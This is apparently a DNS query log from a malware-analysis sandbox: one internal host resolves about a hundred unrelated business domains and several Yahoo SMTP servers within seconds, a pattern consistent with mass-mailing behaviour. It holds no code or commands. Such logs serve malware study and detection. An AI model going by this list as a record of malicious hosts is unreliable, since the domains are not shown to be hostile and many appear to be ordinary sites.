                                                                                                                                                                              Sep 15, 2023 07:28:05.646573067 CEST8.8.8.8192.168.2.30xe94No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.766360998 CEST8.8.8.8192.168.2.30x2734Name error (3)slower.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.771080971 CEST8.8.8.8192.168.2.30x2b42No error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.771080971 CEST8.8.8.8192.168.2.30x2b42No error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.793515921 CEST8.8.8.8192.168.2.30x57e5No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.826885939 CEST8.8.8.8192.168.2.30xe47bName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.857136965 CEST8.8.8.8192.168.2.30xf395No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.917227030 CEST8.8.8.8192.168.2.30x1021No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.921606064 CEST8.8.8.8192.168.2.30x9899No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.953830957 CEST8.8.8.8192.168.2.30x97faNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.964657068 CEST8.8.8.8192.168.2.30xec45No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.964657068 CEST8.8.8.8192.168.2.30xec45No error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.28A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.964657068 CEST8.8.8.8192.168.2.30xec45No error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.964657068 CEST8.8.8.8192.168.2.30xec45No error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.117A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:05.964657068 CEST8.8.8.8192.168.2.30xec45No error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.010545015 CEST8.8.8.8192.168.2.30xa66No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.271441936 CEST8.8.8.8192.168.2.30xa245No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.349607944 CEST8.8.8.8192.168.2.30xf7b3No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.349607944 CEST8.8.8.8192.168.2.30xf7b3No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.349607944 CEST8.8.8.8192.168.2.30xf7b3No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.369013071 CEST8.8.8.8192.168.2.30xb20eServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.393086910 CEST8.8.8.8192.168.2.30xe3f8No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.430143118 CEST8.8.8.8192.168.2.30x5ab0Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.473862886 CEST8.8.8.8192.168.2.30xc9eNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.540451050 CEST8.8.8.8192.168.2.30x616bNo error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.607260942 CEST8.8.8.8192.168.2.30xffbdNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.638591051 CEST8.8.8.8192.168.2.30x91f7No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.656146049 CEST8.8.8.8192.168.2.30xaa80No error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.719193935 CEST8.8.8.8192.168.2.30x7122No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.736958981 CEST8.8.8.8192.168.2.30x4b7bNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.750199080 CEST8.8.8.8192.168.2.30xbfebNo error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.785011053 CEST8.8.8.8192.168.2.30xe245No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.811250925 CEST8.8.8.8192.168.2.30xba59Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.856507063 CEST8.8.8.8192.168.2.30xd7f3No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.872153044 CEST8.8.8.8192.168.2.30xd7f3No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.952481031 CEST8.8.8.8192.168.2.30xa31cName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.955558062 CEST8.8.8.8192.168.2.30xbfffNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:06.972742081 CEST8.8.8.8192.168.2.30xe4a4No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.060825109 CEST8.8.8.8192.168.2.30x233eNo error (0)aluminox.es94.23.84.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.133116961 CEST8.8.8.8192.168.2.30xf981No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.144850969 CEST8.8.8.8192.168.2.30x7266No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.144850969 CEST8.8.8.8192.168.2.30x7266No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.144850969 CEST8.8.8.8192.168.2.30x7266No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.144850969 CEST8.8.8.8192.168.2.30x7266No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.222290039 CEST8.8.8.8192.168.2.30xacaNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.222290039 CEST8.8.8.8192.168.2.30xacaNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.271254063 CEST8.8.8.8192.168.2.30x42a6No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.283894062 CEST8.8.8.8192.168.2.30x2c26No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.301029921 CEST8.8.8.8192.168.2.30x3169No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.330230951 CEST8.8.8.8192.168.2.30x9892No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.368598938 CEST8.8.8.8192.168.2.30x6f4aNo error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.467561960 CEST8.8.8.8192.168.2.30x9229No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.467561960 CEST8.8.8.8192.168.2.30x9229No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.467561960 CEST8.8.8.8192.168.2.30x9229No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.665364981 CEST8.8.8.8192.168.2.30x4972No error (0)ftchat.com104.21.46.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.665364981 CEST8.8.8.8192.168.2.30x4972No error (0)ftchat.com172.67.140.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.960319996 CEST8.8.8.8192.168.2.30xf814No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:07.972826958 CEST8.8.8.8192.168.2.30x18acNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.029897928 CEST8.8.8.8192.168.2.30xa48fNo error (0)dayvo.com104.21.68.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.029897928 CEST8.8.8.8192.168.2.30xa48fNo error (0)dayvo.com172.67.184.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.244194984 CEST8.8.8.8192.168.2.30xce87No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.244194984 CEST8.8.8.8192.168.2.30xce87No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.244194984 CEST8.8.8.8192.168.2.30xce87No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.264420986 CEST8.8.8.8192.168.2.30x3f8bNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.383198977 CEST8.8.8.8192.168.2.30xb20eServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.444360018 CEST8.8.8.8192.168.2.30x5ab0Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.498485088 CEST8.8.8.8192.168.2.30x8580Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.603420973 CEST8.8.8.8192.168.2.30x518cNo error (0)wvs-net.de104.21.43.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.603420973 CEST8.8.8.8192.168.2.30x518cNo error (0)wvs-net.de172.67.181.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.642400980 CEST8.8.8.8192.168.2.30x2dcaNo error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.657284975 CEST8.8.8.8192.168.2.30x6742No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.657284975 CEST8.8.8.8192.168.2.30x6742No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.657284975 CEST8.8.8.8192.168.2.30x6742No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.750540018 CEST8.8.8.8192.168.2.30x652fNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.815603971 CEST8.8.8.8192.168.2.30xa283No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.815603971 CEST8.8.8.8192.168.2.30xa283No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:08.924406052 CEST8.8.8.8192.168.2.30x97e0No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.046716928 CEST8.8.8.8192.168.2.30x2a18No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.141494036 CEST8.8.8.8192.168.2.30x5d64No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.141494036 CEST8.8.8.8192.168.2.30x5d64No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.281713009 CEST8.8.8.8192.168.2.30x39d1No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.285955906 CEST8.8.8.8192.168.2.30x98fcNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.290852070 CEST8.8.8.8192.168.2.30x3fbcNo error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.426888943 CEST8.8.8.8192.168.2.30x9f8dNo error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.486716986 CEST8.8.8.8192.168.2.30x8580Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.491399050 CEST8.8.8.8192.168.2.30x182aNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.491399050 CEST8.8.8.8192.168.2.30x182aNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.548667908 CEST8.8.8.8192.168.2.30xb6fdNo error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.548667908 CEST8.8.8.8192.168.2.30xb6fdNo error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.643395901 CEST8.8.8.8192.168.2.30x6385No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.643395901 CEST8.8.8.8192.168.2.30x6385No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.643395901 CEST8.8.8.8192.168.2.30x6385No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.685739994 CEST8.8.8.8192.168.2.30x2324No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.685904026 CEST8.8.8.8192.168.2.30xf693No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.685904026 CEST8.8.8.8192.168.2.30xf693No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.685904026 CEST8.8.8.8192.168.2.30xf693No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.685904026 CEST8.8.8.8192.168.2.30xf693No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.701445103 CEST8.8.8.8192.168.2.30x3d8dNo error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.841347933 CEST8.8.8.8192.168.2.30x2e6No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:09.878360033 CEST8.8.8.8192.168.2.30xd7f3No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.029124022 CEST8.8.8.8192.168.2.30x13f6No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.029124022 CEST8.8.8.8192.168.2.30x13f6No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.033494949 CEST8.8.8.8192.168.2.30xaa41No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.296571016 CEST8.8.8.8192.168.2.30x1b7dNo error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.307523966 CEST8.8.8.8192.168.2.30x1b22No error (0)oozkranj.com212.44.102.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.319535971 CEST8.8.8.8192.168.2.30x94c7No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.408338070 CEST8.8.8.8192.168.2.30x8356No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.424190998 CEST8.8.8.8192.168.2.30x9076No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.424190998 CEST8.8.8.8192.168.2.30x9076No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.787827015 CEST8.8.8.8192.168.2.30xc678No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.793642044 CEST8.8.8.8192.168.2.30xdde9No error (0)www.tyrns.com217.79.184.35A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.860317945 CEST8.8.8.8192.168.2.30x94b5No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.860317945 CEST8.8.8.8192.168.2.30x94b5No error (0)smtp.mail.global.gm0.yahoodns.net67.195.12.42A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.860317945 CEST8.8.8.8192.168.2.30x94b5No error (0)smtp.mail.global.gm0.yahoodns.net66.163.170.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.860317945 CEST8.8.8.8192.168.2.30x94b5No error (0)smtp.mail.global.gm0.yahoodns.net66.218.88.167A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.892725945 CEST8.8.8.8192.168.2.30x2803No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.892725945 CEST8.8.8.8192.168.2.30x2803No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.897624016 CEST8.8.8.8192.168.2.30x50d2No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.941891909 CEST8.8.8.8192.168.2.30x20f5No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.981971025 CEST8.8.8.8192.168.2.30x53c7Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.088140011 CEST8.8.8.8192.168.2.30xc0afNo error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.088140011 CEST8.8.8.8192.168.2.30xc0afNo error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.317279100 CEST8.8.8.8192.168.2.30x119cNo error (0)www.x0c.com104.247.81.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.519566059 CEST8.8.8.8192.168.2.30xc63eNo error (0)assideum.com52.219.109.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.519566059 CEST8.8.8.8192.168.2.30xc63eNo error (0)assideum.com52.219.108.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.519566059 CEST8.8.8.8192.168.2.30xc63eNo error (0)assideum.com52.219.108.24A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.519566059 CEST8.8.8.8192.168.2.30xc63eNo error (0)assideum.com52.219.109.248A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.519566059 CEST8.8.8.8192.168.2.30xc63eNo error (0)assideum.com52.219.101.4A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.519566059 CEST8.8.8.8192.168.2.30xc63eNo error (0)assideum.com52.219.143.8A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.519566059 CEST8.8.8.8192.168.2.30xc63eNo error (0)assideum.com52.219.94.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.519566059 CEST8.8.8.8192.168.2.30xc63eNo error (0)assideum.com52.219.109.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.639692068 CEST8.8.8.8192.168.2.30x31fName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.793169022 CEST8.8.8.8192.168.2.30x8df5Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.843034983 CEST8.8.8.8192.168.2.30xf4acNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.855794907 CEST8.8.8.8192.168.2.30xedd3Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.897766113 CEST8.8.8.8192.168.2.30x303cNo error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.897766113 CEST8.8.8.8192.168.2.30x303cNo error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.907398939 CEST8.8.8.8192.168.2.30x5e15No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.907398939 CEST8.8.8.8192.168.2.30x5e15No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.907398939 CEST8.8.8.8192.168.2.30x5e15No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.965467930 CEST8.8.8.8192.168.2.30x2086No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.982326984 CEST8.8.8.8192.168.2.30xc036No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.022778988 CEST8.8.8.8192.168.2.30x1dfeNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.022778988 CEST8.8.8.8192.168.2.30x1dfeNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.076586962 CEST8.8.8.8192.168.2.30x27f7No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.258948088 CEST8.8.8.8192.168.2.30x5f32No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.273530006 CEST8.8.8.8192.168.2.30x9d08No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.273530006 CEST8.8.8.8192.168.2.30x9d08No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.273530006 CEST8.8.8.8192.168.2.30x9d08No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.309510946 CEST8.8.8.8192.168.2.30x7416No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.445420980 CEST8.8.8.8192.168.2.30xc8e6No error (0)www.tc17.com172.67.150.80A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.445420980 CEST8.8.8.8192.168.2.30xc8e6No error (0)www.tc17.com104.21.79.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.581311941 CEST8.8.8.8192.168.2.30x2a23No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.857945919 CEST8.8.8.8192.168.2.30x27a4No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.873186111 CEST8.8.8.8192.168.2.30xbdfbNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.952140093 CEST8.8.8.8192.168.2.30x1106No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.952140093 CEST8.8.8.8192.168.2.30x1106No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.952140093 CEST8.8.8.8192.168.2.30x1106No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.952140093 CEST8.8.8.8192.168.2.30x1106No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.952140093 CEST8.8.8.8192.168.2.30x1106No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.478466034 CEST8.8.8.8192.168.2.30xcf8cNo error (0)www.railbook.net208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.478724003 CEST8.8.8.8192.168.2.30x88acServer failure (2)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.599442005 CEST8.8.8.8192.168.2.30x462aNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.617598057 CEST8.8.8.8192.168.2.30x95cNo error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.617598057 CEST8.8.8.8192.168.2.30x95cNo error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.617598057 CEST8.8.8.8192.168.2.30x95cNo error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.817637920 CEST8.8.8.8192.168.2.30x9833Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.879345894 CEST8.8.8.8192.168.2.30xf540No error (0)ifesnet.com172.67.216.194A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.879345894 CEST8.8.8.8192.168.2.30xf540No error (0)ifesnet.com104.21.24.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:14.253000975 CEST8.8.8.8192.168.2.30x8691No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:14.466752052 CEST8.8.8.8192.168.2.30x9833Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
